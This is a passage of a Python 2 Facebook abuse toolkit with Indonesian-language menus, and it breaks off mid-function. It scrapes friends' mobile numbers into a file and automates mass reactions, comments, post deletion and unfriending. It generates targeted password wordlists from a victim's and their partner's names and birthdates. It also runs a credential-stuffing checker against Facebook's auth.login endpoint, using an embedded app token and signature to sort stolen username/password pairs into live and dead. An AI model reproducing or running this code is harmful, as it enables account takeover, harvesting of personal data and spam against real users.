print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
